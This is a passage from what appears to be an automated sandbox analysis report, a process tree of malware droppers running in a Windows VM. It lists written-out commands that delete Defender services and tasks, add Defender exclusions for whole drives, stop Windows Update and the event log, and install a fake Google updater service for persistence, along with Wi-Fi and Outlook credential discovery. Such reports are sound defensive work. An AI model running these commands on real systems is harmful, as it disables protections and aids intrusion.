        
        C:\Windows\system32\sc.exe
        
        sc delete "SecurityHealthService"
        11⤵
        Launches sc.exe
        
        PID:5892
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\SecurityHealthService" /f
        11⤵
        
        PID:3288
        
        C:\Windows\system32\sc.exe
        
        sc stop "webthreatdefsvc"
        11⤵
        Launches sc.exe
        
        PID:6056
        
        C:\Windows\system32\sc.exe
        
        sc delete "webthreatdefsvc"
        11⤵
        Launches sc.exe
        
        PID:5652
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\webthreatdefsvc" /f
        11⤵
        
        PID:5168
        
        C:\Windows\system32\sc.exe
        
        sc stop "webthreatdefusersvc"
        11⤵
        Launches sc.exe
        
        PID:2368
        
        C:\Windows\system32\sc.exe
        
        sc delete "webthreatdefusersvc"
        11⤵
        Launches sc.exe
        
        PID:4300
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\webthreatdefusersvc" /f
        11⤵
        
        PID:1504
        
        C:\Windows\system32\sc.exe
        
        sc stop "WdNisDrv"
        11⤵
        Launches sc.exe
        
        PID:5632
        
        C:\Windows\system32\sc.exe
        
        sc delete "WdNisDrv"
        11⤵
        Launches sc.exe
        
        PID:1876
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\WdNisDrv" /f
        11⤵
        
        PID:1872
        
        C:\Windows\system32\sc.exe
        
        sc stop "WdBoot"
        11⤵
        Launches sc.exe
        
        PID:3248
        
        C:\Windows\system32\sc.exe
        
        sc delete "WdBoot"
        11⤵
        Launches sc.exe
        
        PID:3284
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\WdBoot" /f
        11⤵
        
        PID:372
        
        C:\Windows\system32\sc.exe
        
        sc stop "WdFilter"
        11⤵
        Launches sc.exe
        
        PID:5876
        
        C:\Windows\system32\sc.exe
        
        sc delete "WdFilter"
        11⤵
        Launches sc.exe
        
        PID:4120
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\WdFilter" /f
        11⤵
        
        PID:1500
        
        C:\Windows\system32\sc.exe
        
        sc stop "SgrmAgent"
        11⤵
        Launches sc.exe
        
        PID:5240
        
        C:\Windows\system32\sc.exe
        
        sc delete "SgrmAgent"
        11⤵
        Launches sc.exe
        
        PID:1240
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\SgrmAgent" /f
        11⤵
        
        PID:2144
        
        C:\Windows\system32\sc.exe
        
        sc stop "MsSecWfp"
        11⤵
        Launches sc.exe
        
        PID:3656
        
        C:\Windows\system32\sc.exe
        
        sc delete "MsSecWfp"
        11⤵
        Launches sc.exe
        
        PID:324
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\MsSecWfp" /f
        11⤵
        
        PID:3572
        
        C:\Windows\system32\sc.exe
        
        sc stop "MsSecFlt"
        11⤵
        Launches sc.exe
        
        PID:2704
        
        C:\Windows\system32\sc.exe
        
        sc delete "MsSecFlt"
        11⤵
        Launches sc.exe
        
        PID:2840
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\MsSecFlt" /f
        11⤵
        
        PID:1124
        
        C:\Windows\system32\sc.exe
        
        sc stop "MsSecCore"
        11⤵
        Launches sc.exe
        
        PID:1696
        
        C:\Windows\system32\sc.exe
        
        sc delete "MsSecCore"
        11⤵
        Launches sc.exe
        
        PID:4820
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\MsSecCore" /f
        11⤵
        
        PID:4632
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /f
        11⤵
        
        PID:4688
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /f
        11⤵
        
        PID:4644
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /f
        11⤵
        
        PID:5064
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /f
        11⤵
        
        PID:5308
        
        C:\Windows\system32\sc.exe
        
        sc stop ddrver
        11⤵
        Launches sc.exe
        
        PID:1000
        
        C:\Windows\system32\sc.exe
        
        sc delete ddrver
        11⤵
        Launches sc.exe
        
        PID:2692
      - C:\Users\Admin\AppData\Local\Temp\10429530101\P3Ow4LV.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10429530101\P3Ow4LV.exe"
        6⤵
        Drops file in Drivers directory
        Executes dropped EXE
        Drops file in System32 directory
        Suspicious behavior: EnumeratesProcesses
        
        PID:4460
        
        C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
        
        C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1836
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
        7⤵
        
        PID:6044
        
        C:\Windows\system32\wusa.exe
        
        wusa /uninstall /kb:890830 /quiet /norestart
        8⤵
        
        PID:5620
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop UsoSvc
        7⤵
        Launches sc.exe
        
        PID:836
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop WaaSMedicSvc
        7⤵
        Launches sc.exe
        
        PID:5932
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop wuauserv
        7⤵
        Launches sc.exe
        
        PID:4304
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop bits
        7⤵
        Launches sc.exe
        
        PID:4184
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop dosvc
        7⤵
        Launches sc.exe
        
        PID:5880
        
        C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
        7⤵
        Power Settings
        Suspicious use of AdjustPrivilegeToken
        
        PID:2576
        
        C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
        7⤵
        Power Settings
        Suspicious use of AdjustPrivilegeToken
        
        PID:5876
        
        C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
        7⤵
        Power Settings
        Suspicious use of AdjustPrivilegeToken
        
        PID:5528
        
        C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
        7⤵
        Power Settings
        Suspicious use of AdjustPrivilegeToken
        
        PID:2736
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe delete "GoogleUpdateTaskMachineQC"
        7⤵
        Launches sc.exe
        
        PID:2264
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineQC" binpath= "C:\ProgramData\Google\Chrome\updater.exe" start= "auto"
        7⤵
        Launches sc.exe
        
        PID:4616
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop eventlog
        7⤵
        Launches sc.exe
        
        PID:4836
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe start "GoogleUpdateTaskMachineQC"
        7⤵
        Launches sc.exe
        
        PID:4644
      - C:\Users\Admin\AppData\Local\Temp\10429610101\9sWdA2p.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10429610101\9sWdA2p.exe"
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:5340
      - C:\Users\Admin\AppData\Local\Temp\10430250101\amnew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10430250101\amnew.exe"
        6⤵
        Checks computer location settings
        Executes dropped EXE
        Drops file in Windows directory
        System Location Discovery: System Language Discovery
        
        PID:5956
        
        C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
        
        "C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe"
        7⤵
        Downloads MZ/PE file
        Checks computer location settings
        Executes dropped EXE
        Adds Run key to start application
        System Location Discovery: System Language Discovery
        
        PID:1640
        
        C:\Users\Admin\AppData\Local\Temp\10049920101\e6d163131d.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10049920101\e6d163131d.exe"
        8⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:2824
        
        C:\Users\Admin\AppData\Local\Temp\svchost015.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10049920101\e6d163131d.exe"
        9⤵
        Downloads MZ/PE file
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:3252
        
        C:\Users\Admin\AppData\Local\Temp\10049930101\3c788c05e7.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10049930101\3c788c05e7.exe"
        8⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        
        PID:2304
        
        C:\Users\Admin\AppData\Local\Temp\svchost015.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10049930101\3c788c05e7.exe"
        9⤵
        Downloads MZ/PE file
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:4020
      - C:\Users\Admin\AppData\Local\Temp\10430350101\i4cwegu.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10430350101\i4cwegu.exe"
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:2892
      - C:\Users\Admin\AppData\Local\Temp\10431490101\Yhihb8G.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10431490101\Yhihb8G.exe"
        6⤵
        Executes dropped EXE
        Accesses Microsoft Outlook profiles
        System Location Discovery: System Language Discovery
        Checks processor information in registry
        Suspicious use of AdjustPrivilegeToken
        
        PID:5956
        
        C:\Windows\SysWOW64\cmd.exe
        
        "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
        7⤵
        System Location Discovery: System Language Discovery
        System Network Configuration Discovery: Wi-Fi Discovery
        
        PID:3008
        
        C:\Windows\SysWOW64\chcp.com
        
        chcp 65001
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:3572
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh wlan show profile
        8⤵
        Event Triggered Execution: Netsh Helper DLL
        System Location Discovery: System Language Discovery
        System Network Configuration Discovery: Wi-Fi Discovery
        
        PID:2248
        
        C:\Windows\SysWOW64\findstr.exe
        
        findstr All
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:4812
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5956 -s 1996
        7⤵
        Program crash
        
        PID:5632
      - C:\Users\Admin\AppData\Local\Temp\10432050101\Yhihb8G.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10432050101\Yhihb8G.exe"
        6⤵
        Executes dropped EXE
        Accesses Microsoft Outlook profiles
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        outlook_office_path
        outlook_win_path
        
        PID:3140
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3140 -s 1840
        7⤵
        Program crash
        
        PID:5020
        
        C:\Windows\SysWOW64\cmd.exe
        
        "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
        7⤵
        System Location Discovery: System Language Discovery
        System Network Configuration Discovery: Wi-Fi Discovery
        
        PID:4736
        
        C:\Windows\SysWOW64\chcp.com
        
        chcp 65001
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:4888
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh wlan show profile
        8⤵
        Event Triggered Execution: Netsh Helper DLL
        System Location Discovery: System Language Discovery
        System Network Configuration Discovery: Wi-Fi Discovery
        
        PID:2940
        
        C:\Windows\SysWOW64\findstr.exe
        
        findstr All
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:3232
      - C:\Users\Admin\AppData\Local\Temp\10432060101\9sWdA2p.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10432060101\9sWdA2p.exe"
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:3052
      - C:\Users\Admin\AppData\Local\Temp\10432070101\P3Ow4LV.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10432070101\P3Ow4LV.exe"
        6⤵
        Drops file in Drivers directory
        Executes dropped EXE
        Drops file in System32 directory
        
        PID:3164
        
        C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
        
        C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:6064
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
        7⤵
        
        PID:5708
        
        C:\Windows\system32\wusa.exe
        
        wusa /uninstall /kb:890830 /quiet /norestart
        8⤵
        
        PID:6080
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop UsoSvc
        7⤵
        Launches sc.exe
        
        PID:1832
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop WaaSMedicSvc
        7⤵
        Launches sc.exe
        
        PID:3980
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop wuauserv
        7⤵
        Launches sc.exe
        
        PID:5920
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop bits
        7⤵
        Launches sc.exe
        
        PID:4508
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop dosvc
        7⤵
        Launches sc.exe
        
        PID:6028
        
        C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
        7⤵
        Power Settings
        Suspicious use of AdjustPrivilegeToken
        
        PID:6016
        
        C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
        7⤵
        Power Settings
        Suspicious use of AdjustPrivilegeToken
        
        PID:4012
        
        C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
        7⤵
        Power Settings
        Suspicious use of AdjustPrivilegeToken
        
        PID:3748
        
        C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
        7⤵
        Power Settings
        Suspicious use of AdjustPrivilegeToken
        
        PID:5060
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop eventlog
        7⤵
        Launches sc.exe
        
        PID:2564
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe start "GoogleUpdateTaskMachineQC"
        7⤵
        Launches sc.exe
        
        PID:6136
      - C:\Users\Admin\AppData\Local\Temp\10432080101\TbV75ZR.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10432080101\TbV75ZR.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:3256
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:2796
      - C:\Users\Admin\AppData\Local\Temp\10432090101\dojG16n.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10432090101\dojG16n.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:1180
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:2564
      - C:\Users\Admin\AppData\Local\Temp\10432100101\7IIl2eE.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10432100101\7IIl2eE.exe"
        6⤵
        Checks computer location settings
        Executes dropped EXE
        Drops file in Windows directory
        System Location Discovery: System Language Discovery
        
        PID:4536
        
        C:\Windows\SysWOW64\CMD.exe
        
        "C:\Windows\system32\CMD.exe" /c copy Expectations.cab Expectations.cab.bat & Expectations.cab.bat
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:4240
      - C:\Users\Admin\AppData\Local\Temp\10432110101\UZPt0hR.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10432110101\UZPt0hR.exe"
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious behavior: MapViewOfSection
        
        PID:1348
        
        C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:'
        7⤵
        
        PID:4428
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Add-MpPreference -ExclusionPath 'C:'
        8⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:5020
        
        C:\Windows\system32\svchost.exe
        
        "C:\Windows\system32\svchost.exe"
        7⤵
        Downloads MZ/PE file
        Adds Run key to start application
        
        PID:2116
        
        C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe
        
        "C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe" ""
        8⤵
        Executes dropped EXE
        
        PID:5744
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Add-MpPreference -ExclusionPath C:\
        9⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:6664
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Remove-MpPreference -ExclusionPath C:\
        9⤵
        
        PID:5040
        
        C:\Users\Admin\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe
        
        "C:\Users\Admin\AppData\Local\Temp\\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe" ""
        8⤵
        
        PID:4084
      - C:\Users\Admin\AppData\Local\Temp\10432120101\8ce048e8db.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10432120101\8ce048e8db.exe"
        6⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Writes to the Master Boot Record (MBR)
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        
        PID:3008
      - C:\Users\Admin\AppData\Local\Temp\10432130101\6526e72213.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10432130101\6526e72213.exe"
        6⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        
        PID:2796
      - C:\Users\Admin\AppData\Local\Temp\10432140101\UZSECGPC.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10432140101\UZSECGPC.exe"
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:6784
        
        C:\Users\Admin\AppData\Local\Temp\{120E058A-DF8C-4251-B057-DA675FD21223}\UZSECGPC.exe
        
        C:\Users\Admin\AppData\Local\Temp\{120E058A-DF8C-4251-B057-DA675FD21223}\UZSECGPC.exe -package:"C:\Users\Admin\AppData\Local\Temp\10432140101\UZSECGPC.exe" -no_selfdeleter -IS_temp -media_path:"C:\Users\Admin\AppData\Local\Temp\{120E058A-DF8C-4251-B057-DA675FD21223}\Disk1\" -tempdisk1folder:"C:\Users\Admin\AppData\Local\Temp\{120E058A-DF8C-4251-B057-DA675FD21223}\" -IS_OriginalLauncher:"C:\Users\Admin\AppData\Local\Temp\{120E058A-DF8C-4251-B057-DA675FD21223}\Disk1\UZSECGPC.exe"
        7⤵
        Executes dropped EXE
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        
        PID:6920
        
        C:\Users\Admin\AppData\Local\Temp\{763FB6B0-5054-4DD0-9BC5-7AFFCE46154B}\ISBEW64.exe
        
        C:\Users\Admin\AppData\Local\Temp\{763FB6B0-5054-4DD0-9BC5-7AFFCE46154B}\ISBEW64.exe {EFB7539B-24F3-46B6-AF6E-3B021B51EFEF}:{CE7108E6-EC8B-4493-90E1-D7E3643174D2}
        8⤵
        Executes dropped EXE
        
        PID:3596
        
        C:\Users\Admin\AppData\Local\Temp\{763FB6B0-5054-4DD0-9BC5-7AFFCE46154B}\ISBEW64.exe
        
        C:\Users\Admin\AppData\Local\Temp\{763FB6B0-5054-4DD0-9BC5-7AFFCE46154B}\ISBEW64.exe {EFB7539B-24F3-46B6-AF6E-3B021B51EFEF}:{E200A5C2-C32C-46DE-AA07-2AE368F39B82}
        8⤵
        Executes dropped EXE
        
        PID:3892
        
        C:\Users\Admin\AppData\Local\Temp\{763FB6B0-5054-4DD0-9BC5-7AFFCE46154B}\ISBEW64.exe
        
        C:\Users\Admin\AppData\Local\Temp\{763FB6B0-5054-4DD0-9BC5-7AFFCE46154B}\ISBEW64.exe {EFB7539B-24F3-46B6-AF6E-3B021B51EFEF}:{2C69E5CF-3915-49F7-98CC-004BEC2E659A}
        8⤵
        
        PID:4772
        
        C:\Users\Admin\AppData\Local\Temp\{763FB6B0-5054-4DD0-9BC5-7AFFCE46154B}\ISBEW64.exe
        
        C:\Users\Admin\AppData\Local\Temp\{763FB6B0-5054-4DD0-9BC5-7AFFCE46154B}\ISBEW64.exe {EFB7539B-24F3-46B6-AF6E-3B021B51EFEF}:{A0F86628-F903-4436-927D-BC0418826454}
        8⤵
        
        PID:2632
        
        C:\Users\Admin\AppData\Local\Temp\{763FB6B0-5054-4DD0-9BC5-7AFFCE46154B}\ISBEW64.exe
        
        C:\Users\Admin\AppData\Local\Temp\{763FB6B0-5054-4DD0-9BC5-7AFFCE46154B}\ISBEW64.exe {EFB7539B-24F3-46B6-AF6E-3B021B51EFEF}:{3502613D-C783-434E-B416-FA1AF38DE846}
        8⤵
        
        PID:4812
      - C:\Users\Admin\AppData\Local\Temp\10432150101\Rm3cVPI.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10432150101\Rm3cVPI.exe"
        6⤵
        
        PID:2620

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:4520

C:\ProgramData\Google\Chrome\updater.exe
C:\ProgramData\Google\Chrome\updater.exe
1⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
PID:4640
- C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4680
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
  2⤵
  PID:3948
- - C:\Windows\system32\wusa.exe
    wusa /uninstall /kb:890830 /quiet /norestart
    3⤵
    PID:3736
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop UsoSvc
  2⤵
  - Launches sc.exe
  PID:4708
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop WaaSMedicSvc
  2⤵
  - Launches sc.exe
  PID:5640
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop wuauserv
  2⤵
  - Launches sc.exe
  PID:1260
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop bits
  2⤵
  - Launches sc.exe
  PID:3428
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop dosvc
  2⤵
  - Launches sc.exe
  PID:4008
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
  2⤵
  - Power Settings
  - Suspicious use of AdjustPrivilegeToken
  PID:5616
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
  2⤵
  - Power Settings
  - Suspicious use of AdjustPrivilegeToken
  PID:4996
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
  2⤵
  - Power Settings
  - Suspicious use of AdjustPrivilegeToken
  PID:4636
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
  2⤵
  - Power Settings
  - Suspicious use of AdjustPrivilegeToken
  PID:5384
- C:\Windows\system32\conhost.exe
  C:\Windows\system32\conhost.exe
  2⤵
  PID:5636
- C:\Windows\explorer.exe
  explorer.exe
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4064

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 356 -p 5956 -ip 5956
1⤵
PID:2332

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 3140 -ip 3140
1⤵
PID:6128

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:2588

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\ProgramData\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}
1⤵
PID:5252

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\ProgramData\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}
1⤵
PID:3720

C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
1⤵
- Executes dropped EXE
PID:1600

C:\ProgramData\Google\Chrome\updater.exe
C:\ProgramData\Google\Chrome\updater.exe
1⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Drops file in System32 directory
PID:5844
- C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:5632
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
  2⤵
  PID:5660
- - C:\Windows\system32\wusa.exe
    wusa /uninstall /kb:890830 /quiet /norestart
    3⤵
    PID:1900
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop UsoSvc
  2⤵
  - Launches sc.exe
  PID:232
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop WaaSMedicSvc
  2⤵
  - Launches sc.exe
  PID:5812
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop wuauserv
  2⤵
  - Launches sc.exe
  PID:4456
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop bits
  2⤵
  - Launches sc.exe
  PID:4732
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop dosvc
  2⤵
  - Launches sc.exe
  PID:1660
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
  2⤵
  - Power Settings
  - Suspicious use of AdjustPrivilegeToken
  PID:2152
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:6080
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
  2⤵
  - Power Settings
  - Suspicious use of AdjustPrivilegeToken
  PID:3824
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
  2⤵
  - Power Settings
  - Suspicious use of AdjustPrivilegeToken
  PID:4736
- C:\Windows\system32\powercfg.exe
